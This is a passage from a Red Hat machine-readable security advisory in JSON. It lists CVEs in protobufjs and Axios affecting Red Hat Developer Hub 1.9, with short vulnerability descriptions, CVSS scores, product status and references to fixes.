          "text": "This is an Important flaw affecting Red Hat products that incorporate the protobufjs library. protobufjs is vulnerable to arbitrary code execution when compiling protobuf definitions into JavaScript. During generation of the toObject conversion function, a schema-controlled default value on a bytes field that is not a string can be emitted as unsafe JavaScript code. An attacker who can supply or influence the protobuf descriptor processed by the application (low privileges required) may achieve code execution in the Node.js process context. Fixed upstream in protobufjs 7.5.6 and 8.0.2. Affects Red Hat offerings that bundle protobufjs and process attacker-influenced protobuf schemas at runtime.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-44293"
        },
        {
          "category": "external",
          "summary": "RHBZ#2477104",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477104"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-44293",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44293"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44293",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44293"
        },
        {
          "category": "external",
          "summary": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-66ff-xgx4-vchm",
          "url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-66ff-xgx4-vchm"
        }
      ],
      "release_date": "2026-05-13T14:43:33.342000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "protobufjs: protobufjs: Arbitrary code execution due to unsafe expression generation from crafted protobuf descriptors"
    },
    {
      "cve": "CVE-2026-44486",
      "cwe": {
        "id": "CWE-201",
        "name": "Insertion of Sensitive Information Into Sent Data"
      },
      "discovery_date": "2026-06-11T17:01:30.944384+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2487947"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client, specifically in its Node.js HTTP adapter. When Axios is configured to use an authenticated proxy and follows a redirect, it may inadvertently send the Proxy-Authorization header, containing proxy credentials, to the redirect target. This can lead to the disclosure of sensitive proxy credentials to an unintended remote server.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Information disclosure of proxy credentials via HTTP redirects",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-44486"
        },
        {
          "category": "external",
          "summary": "RHBZ#2487947",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487947"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-44486",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44486"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44486",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44486"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-j5f8-grm9-p9fc",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-j5f8-grm9-p9fc"
        }
      ],
      "release_date": "2026-06-11T15:39:07.714000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Information disclosure of proxy credentials via HTTP redirects"
    },
    {
      "cve": "CVE-2026-44487",
      "cwe": {
        "id": "CWE-201",
        "name": "Insertion of Sensitive Information Into Sent Data"
      },
      "discovery_date": "2026-06-11T17:01:34.091476+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2487948"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios. During specific proxy-to-direct redirect flows in the Node.js HTTP adapter, a remote attacker could exploit this vulnerability. The Proxy-Authorization header, which contains proxy credentials and is intended only for the outbound proxy, may be forwarded to the final redirected origin. This can lead to the disclosure of sensitive proxy credentials to an unintended third party.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Information disclosure of proxy credentials via redirect flows",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-44487"
        },
        {
          "category": "external",
          "summary": "RHBZ#2487948",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487948"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-44487",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44487"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44487",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44487"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-p92q-9vqr-4j8v",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-p92q-9vqr-4j8v"
        }
      ],
      "release_date": "2026-06-11T15:38:25.150000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Information disclosure of proxy credentials via redirect flows"
    },
    {
      "cve": "CVE-2026-44488",
      "cwe": {
        "id": "CWE-770",
        "name": "Allocation of Resources Without Limits or Throttling"
      },
      "discovery_date": "2026-06-11T17:01:36.836488+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2487949"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. When using the fetch adapter, Axios did not properly enforce configured request and response size limits. This vulnerability allows a remote attacker, through a malicious or compromised server, or by supplying a large data URL, to send or receive oversized data bodies. This can lead to resource exhaustion in server-side applications, resulting in a Denial of Service (DoS).",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Denial of Service due to unenforced request and response size limits",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-44488"
        },
        {
          "category": "external",
          "summary": "RHBZ#2487949",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487949"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-44488",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44488"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44488",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44488"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-777c-7fjr-54vf",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-777c-7fjr-54vf"
        }
      ],
      "release_date": "2026-06-11T15:37:38.013000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Denial of Service due to unenforced request and response size limits"
    },
    {
      "cve": "CVE-2026-44492",
      "cwe": {
        "id": "CWE-289",
        "name": "Authentication Bypass by Alternate Name"
      },
      "discovery_date": "2026-06-11T17:00:56.761751+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2487938"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a promise-based HTTP client. This vulnerability occurs because Axios does not properly normalize IPv4-mapped IPv6 addresses. When a NO_PROXY setting is configured to block direct access to specific IPv4 addresses, an attacker can bypass this restriction by using the IPv4-mapped IPv6 form of the address in a request URL. This allows the request to be routed through the proxy, potentially exposing internal services or sensitive information that should otherwise be inaccessible.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Proxy bypass via IPv4-mapped IPv6 address non-normalization",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-44492"
        },
        {
          "category": "external",
          "summary": "RHBZ#2487938",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487938"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-44492",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44492"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44492",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44492"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-pjwm-pj3p-43mv",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-pjwm-pj3p-43mv"
        }
      ],
      "release_date": "2026-06-11T15:29:13.890000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-16T09:33:13+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:26234"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Proxy bypass via IPv4-mapped IPv6 address non-normalization"
    },
    {
      "cve": "CVE-2026-44494",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-06-11T17:01:12.945664+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2487942"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios. This vulnerability, a Prototype Pollution \"Gadget\" attack, allows an attacker to escalate any existing Object.prototype pollution in an application\u0027s dependency tree into a full Man-in-the-Middle (MITM) attack. This enables the attacker to intercept, read, and modify all HTTP traffic, including sensitive authentication credentials. The flaw occurs because the `config.proxy` setting is susceptible to prototype pollution, allowing an attacker to inject a malicious proxy server.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Man-in-the-Middle (MITM) attack via Prototype Pollution",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:dca74b10e54c6598ef2f8d962f677895ee6ca745778f0f5db25e0ebfe443990e_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:dac8b7c19b9bf59aa6df97828ae6955252ba45246d1597cd2cf46c028dfce4fb_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:9e95e1183f47b0f9aa439bdb408a0ccdf87b72cefe704abad0c7e9a90bd607f5_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-44494"
        },
        {
          "category": "external",
          "summary": "RHBZ#2487942",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2487942"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-44494",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-44494"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44494",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44494"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-35jp-ww65-95wh"
        }
      ],
